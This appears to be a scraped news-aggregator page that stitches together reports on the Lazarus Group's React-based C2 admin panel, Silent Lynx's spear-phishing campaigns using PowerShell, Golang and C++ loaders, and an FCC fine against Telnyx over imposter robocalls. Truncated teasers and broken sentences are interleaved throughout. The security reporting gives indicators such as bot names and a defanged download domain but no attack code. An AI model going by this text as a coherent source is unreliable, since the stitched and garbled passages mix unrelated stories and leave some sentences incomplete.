Silent Lynx Using PowerShell, Golang, and C++ Loaders in Multi-Stage Cyberattacks - Related to control, team, cyberattacks, admin, call

Lazarus Group Uses React-Based Admin Panel to Control Global Cyber Attacks

The North Korean threat actor known as the Lazarus Group has been observed leveraging a "web-based administrative platform" to oversee its command-and-control (C2) infrastructure, giving the adversary the ability to centrally supervise all aspects of their campaigns.

"Each C2 server hosted a web-based administrative platform, built with a React application and a [website] API," SecurityScorecard's STRIKE team expressed in a new investigation shared with The Hacker News. "This administrative layer was consistent across all the C2 servers analyzed, even as the attackers varied their payloads and obfuscation techniques to evade detection."

The hidden framework has been described as a comprehensive system and a hub that allows attackers to organize and manage exfiltrated data, maintain oversight of their compromised hosts, and handle payload delivery.

The web-based admin panel has been identified in connection with a supply chain attack campaign dubbed Operation Phantom Circuit targeting the cryptocurrency sector and developers worldwide with trojanized versions of legitimate software packages that contain backdoors.

"These are legitimate packages ranging from cryptocurrency applications to authentication solutions," Ryan Sherstobitoff, senior vice president of Threat Research and Intelligence at SecurityScorecard, told The Hacker News. "What they have in common is that many of these applications are web apps using [website]"

"They are embedding obfuscated code into the repositories and tricking software developers into running the code as part of a skills test, interview or some other opportunity, often these developers are running it on their corporate laptops. This then allows for the operators to infiltrate companies around the world."

The campaign, which took place between September 2024 and January 2025, is estimated to have claimed 233 victims across the world in January and 1,639 in total, with most of them identified in Brazil, France, and India. Of the 233 entities that were targeted, 110 are located in India.

The Lazarus Group has become something of a social engineering expert, luring prospective targets using LinkedIn as an initial infection vector under the guise of lucrative job opportunities or a joint collaboration on crypto-related projects.

The operation's links to Pyongyang stem from the use of Astrill VPN – which has previously been linked to the fraudulent information technology (IT) worker scheme – and the discovery of six distinct North Korean IP addresses that have been found initiating connections, which were routed through Astrill VPN exit nodes and Oculus Proxy endpoints.

"The obfuscated traffic ultimately reached the C2 infrastructure, hosted on Stark Industries servers. These servers facilitated payload delivery, victim management, and data exfiltration," SecurityScorecard stated.

Further analysis of the admin component has revealed that it allows the threat actors to view exfiltrated data from victims, as well as search and filter of interest.

It is suspected that the web administrative platform has been used in all campaigns related to the IT Worker threat, serving as a conduit for the threat actors to manage the collected information from victims abroad, per Sherstobitoff.

"By embedding obfuscated backdoors into legitimate software packages, Lazarus deceived clients into executing compromised applications, enabling them to exfiltrate sensitive data and manage victims through command-and-control (C2) servers over port 1224," the business stated.

"The campaign's infrastructure leveraged hidden React-based web-admin panels and [website] APIs for centralized management of stolen data, affecting over 233 victims worldwide. This exfiltrated data was traced back to Pyongyang, North Korea, through a layered network of Astrill VPNs and intermediate proxies."

Hackers are targeting vulnerable SimpleHelp RMM clients to create administrator accounts, drop backdoors, and potentially lay the groundwork for ranso......

A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan......

The North Korea-linked nation-state hacking group known as Kimsuky has been observed conducting spear-phishing attacks to deliver an information steal......

Silent Lynx Using PowerShell, Golang, and C++ Loaders in Multi-Stage Cyberattacks

A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan.

"This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector," Seqrite Labs researcher Subhajeet Singha stated in a technical study .

Targets of the hacking group's attacks include embassies, lawyers, government-backed banks, and think tanks. The activity has been attributed to a Kazakhstan-origin threat actor with a medium level of confidence.

The infections commence with a spear-phishing email containing a RAR archive attachment that ultimately acts as a delivery vehicle for malicious payloads responsible for granting remote access to the compromised hosts.

The first of the two campaigns, detected by the cybersecurity business on December 27, 2024, leverages the RAR archive to launch an ISO file that, in turn, includes a malicious C++ binary and a decoy PDF file. The executable subsequently proceeds to run a PowerShell script that uses Telegram bots (named "@south_korea145_bot" and "@south_afr_angl_bot") for command execution and data exfiltration.

Some of the commands executed via the bots include curl commands to download and save additional payloads from a remote server ("pweobmxdlboi[.]com") or Google Drive.

The other campaign, in contrast, employs a malicious RAR archive containing two files: A decoy PDF and a Golang executable, the latter of which is designed to establish a reverse shell to an attacker-controlled server ("[website][.]22:8082").

Seqrite Labs stated it observed some level of tactical overlaps between the threat actor and YoroTrooper (aka SturgeonPhisher), which has been linked to attacks targeting the Commonwealth of Independent States (CIS) countries using PowerShell and Golang tools.

"Silent Lynx's campaigns demonstrate a sophisticated multi-stage attack strategy using ISO files, C++ loaders, PowerShell scripts, and Golang implants," Singha presented.

"Their reliance on Telegram bots for command and control, combined with decoy documents and regional targeting which also highlights their focus on espionage in Central Asia and SPECA based nations."

Microsoft has released a PowerShell script to help Windows consumers and admins modification bootable media so it utilizes the new.

A critical security flaw has been disclosed in the Cacti open-source network monitoring and fault management framework that could allow an authenticat......

A malware campaign has been observed delivering a remote access trojan (RAT) named AsyncRAT by making use of Python payloads and TryCloudflare tunnels......

Robocallers posing as FCC fraud prevention team call FCC staff

The FCC has proposed a $4,492,500 fine against VoIP service provider Telnyx for allegedly allowing people to make robocalls posing as fictitious FCC "Fraud Prevention Team," by failing to comply with Know Your Customer (KYC) rules. However, Telnyx says the FCC is mistaken and denies the accusations.

Between February 6 and February 7, 2024, they made 1,797 imposter calls before Telnyx terminated their accounts. Ironically, their calls also reached over a dozen FCC staff and family members on their personal and work phone numbers one year ago.

, the callers used prerecorded messages with artificial voices, saying, "Hello [first name of recipient], you are receiving an automated call from the Federal Communications Commission notifying you the Fraud Prevention Team would like to speak with you."

But the FCC has no fraud prevention team, and the agency's Enforcement Bureau believes the calls' purpose was "to threaten, intimidate, and defraud," seeing that at least one recipient of these imposter calls was connected to someone who "demand[ed] that [they] pay the FCC $1000 in Google gift cards to avoid jail time for [their] crimes against the state."

The FCC also added that it doesn't "publish or otherwise share staff personal phone numbers" and is "unclear how these individuals were targeted."

, Telnyx failed to take the necessary measures to prevent malicious actors from using its VoIP network for illegal voice traffic, violating Know Your Customer (KYC) rules.

Such measures include requesting copies of government-issued identification, corporate formation records, and third-party records of a customer's physical address to verify the identity of clients who request access to services that would allow them to make a significant volume of calls.

"Cracking down on illegal robocalls will be a top priority at the FCC. That is why I am pleased that our first Commission-level action is a bipartisan vote in favor of this nearly $[website] million proposed fine. This fine flows from an apparently illegal robocalling scheme and continues the FCC's longstanding work to stop bad actors," expressed FCC Chairman Brendan Carr on Tuesday.

"Providers are required to know their end-people and secure their networks to deter fraudulent and malicious calls," added Patrick Webre, Acting Chief of the Enforcement Bureau.

Telnyx is a cloud-based platform that provides carrier-grade voice services over the Internet. It holds carrier status in over 30 countries worldwide, offers global calling services, local calling in over 80 countries, and Public Switched Telephone Network (PSTN) replacement in 45+ markets.

The business also allows people to build "unique, context-aware AI voice bots in minutes using propriety data" and offers people a Voice API that helps them "make, receive, and control calls globally with programmable voice capabilities."

In a press release , Telnyx denied all allegations, stated the "FCC's Notice of Apparent Liability is factually mistaken," and added that it is "surprised by the FCC's mistaken decision."

"Telnyx has done everything and more than the FCC has required for Know-Your-Customer ('KYC') and customer due diligence procedures," the enterprise stated.

"More importantly, the FCC is mistaken about the KYC and due diligence standards that apply to the industry. The FCC's own regulations have long stated that perfection in mitigating illegal traffic is not required. [..] Notably, there has been no allegation of subsequent recurring activity."

As the cybersecurity landscape continues to evolve, proactive vulnerability management has become a critical priority for managed service providers (M......

A team of security researchers from Georgia Institute of Technology and Ruhr University Bochum has demonstrated two new side-channel attacks targeting......

The North Korea-linked nation-state hacking group known as Kimsuky has been observed conducting spear-phishing attacks to deliver an information steal......